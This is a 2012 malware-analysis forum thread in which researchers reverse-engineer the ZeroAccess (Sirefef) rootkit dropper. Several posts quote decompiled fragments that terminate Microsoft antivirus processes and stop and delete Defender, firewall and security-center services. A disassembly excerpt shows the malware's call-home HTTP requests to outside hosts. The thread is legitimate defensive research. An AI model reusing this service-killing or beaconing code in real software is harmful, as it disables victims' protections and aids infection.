A forum for reverse engineering, OS internals and malware analysis 

ZeroAccess (alias MaxPlus, Sirefef)

Forum for analysis and discussion about malware.

Re: Rootkit ZeroAccess (alias Max++, Sirefef)

 #13963  by EP_X0FF
 Thu Jun 14, 2012 6:17 am
w32 & w64 are exactly the same code that presents in all infected services.exe posted here. Someone can try to infect machine with sample posted above. Running sample on x86 winxp - so far no services.exe modifications. One thing is now completely clear - all infections are strictly linked with Sirefef exactly not any other malware. And by the way, for kmd, I was right with dropper size :)

Re: Rootkit ZeroAccess (alias Max++, Sirefef)

 #13964  by EP_X0FF
 Thu Jun 14, 2012 6:32 am
Attached decrypted dropper. See @00401FA0 for infection routine alongside with CAB extraction.

Services.exe is hardcoded
\systemroot\system32\services.exe
There are two code flows - one allows services.exe infection and one not. Both called from different places.
Check it at @00401670.

Routine that check presence of ZeroAccess rootkit edition @004010E2

Basically it is trying to open ZA rootkit device object \\??\\ACPI#PNP0303#2&da1a3ff&0, so it can skip already infected machines. If rootkit found, routine returns STATUS_VALIDATE_CONTINUE otherwise STATUS_OBJECT_NAME_NOT_FOUND (returned by Windows itself).
Attachments
pass: malware
(127.19 KiB) Downloaded 76 times

Re: Rootkit ZeroAccess (alias Max++, Sirefef)

 #13966  by EP_X0FF
 Thu Jun 14, 2012 7:23 am
Also ZeroAccess loves MSE and Windows Defender. See @004026D5
It is doing this before services.exe infection.
Code: Select all
BOOLEAN CheckMSE(PUNICODE_STRING pav)
{
  return (BOOLEAN)RtlEqualUnicodeString(&WindowsDefenderSvc, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSE_MsasCUI, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSE_MpCmdRun, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSE_NisSrv, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSSE, pav, 1);
}
Code: Select all
Status = ZwOpenProcess(&hProcess, PROCESS_TERMINATE, &obja, entry->ClientId);
if ( NT_SUCCESS(Status) )
{
      ZwTerminateProcess(hProcess, 0);
      result = ZwClose(hProcess);
}
Code: Select all
hSCObject = OpenSCManagerW(0, 0, 0xF003Fu);
if ( hSCObject )
{
    hSvc = OpenServiceW(hSCObject, L"MsMpSvc", 0xF01FFu);
    if ( hSvc )
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"windefend", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"SharedAccess", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(v5);
    hSvc = OpenServiceW(hSCObject, L"iphlpsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"wscsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"mpssvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"bfe", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    CloseServiceHandle(hSCObject);
    KillMSE(pentry);
}
uncrypted.exe
:D

Re: Rootkit ZeroAccess (alias Max++, Sirefef)

 #13969  by EP_X0FF
 Thu Jun 14, 2012 8:02 am
kmd wrote:@EP_X0FF

F-Secure blogged about ZeroAccess http://www.f-secure.com/weblog/archives/00002385.html
STATUS_VALIDATE_CONTINUE included
This has been known long time ago. F-Secure should google more. Prevx described dropper infection marker checking in its 2011 article.
http://pxnow.prevx.com/content/blog/zer ... alysis.pdf

and self deletion is nothing really interesting, they simple used NativeAPI/Context modification in combination with shellcode instead of usual CreateRemoteThread in Explorer etc.

Re: Rootkit ZeroAccess (alias Max++, Sirefef)

 #13971  by kmd
 Thu Jun 14, 2012 8:17 am
.rdata:00422530 aGetCount_php?i db 'GET /count.php?id=%u&c=%u&d=7&s=%u HTTP/1.1',0Dh,0Ah
.rdata:00422530 ; DATA XREF: sub_402333+92o
.rdata:00422530 db 'Host: livecounter.co',0Dh,0Ah
.rdata:00422530 db 'User-Agent: Opera/9 (Windows NT %u.%u; %s; %s)',0Dh,0Ah
.rdata:00422530 db 'Connection: close',0Dh,0Ah
.rdata:00422530 db 0Dh,0Ah,0
.rdata:004225B9 align 10h
.rdata:004225C0 aGetGeoTxtCity_ db 'GET /geo/txt/city.php HTTP/1.0',0Dh,0Ah
.rdata:004225C0 ; DATA XREF: sub_402534+12o
.rdata:004225C0 db 'Host: promos.fling.com',0Dh,0Ah
.rdata:004225C0 db 'Connection: close',0Dh,0Ah
.rdata:004225C0 db 0Dh,0Ah,0
.rdata:0042260E align 10h
wtf?

Re: Rootkit ZeroAccess (alias Max++, Sirefef)

 #13972  by EP_X0FF
 Thu Jun 14, 2012 8:22 am
Captain obvious told me: sh*t calls home and it want to know exact location of install, search WSASend somewhere in code which refers to these strings. It also reports was the system win64 or win32.

Re: Rootkit ZeroAccess (alias Max++, Sirefef)

 #13975  by thisisu
 Thu Jun 14, 2012 3:30 pm
EP_X0FF wrote:
Code: Select all
hSCObject = OpenSCManagerW(0, 0, 0xF003Fu);
if ( hSCObject )
{
    hSvc = OpenServiceW(hSCObject, L"MsMpSvc", 0xF01FFu);
    if ( hSvc )
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"windefend", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"SharedAccess", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(v5);
    hSvc = OpenServiceW(hSCObject, L"iphlpsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"wscsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"mpssvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"bfe", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    CloseServiceHandle(hSCObject);
    KillMSE(pentry);
}
What does the 0xF01FFu in this code mean?

Edit: Some googling suggests: SERVICE_ALL_ACCESS = 0xf01ffu

So basically ZA tries to locate the above services, if it finds them, will grant full permissions over them and then stops and deletes them? :)
  • 1
  • 10
  • 11
  • 12
  • 13
  • 14
  • 56
 Return to “Malware”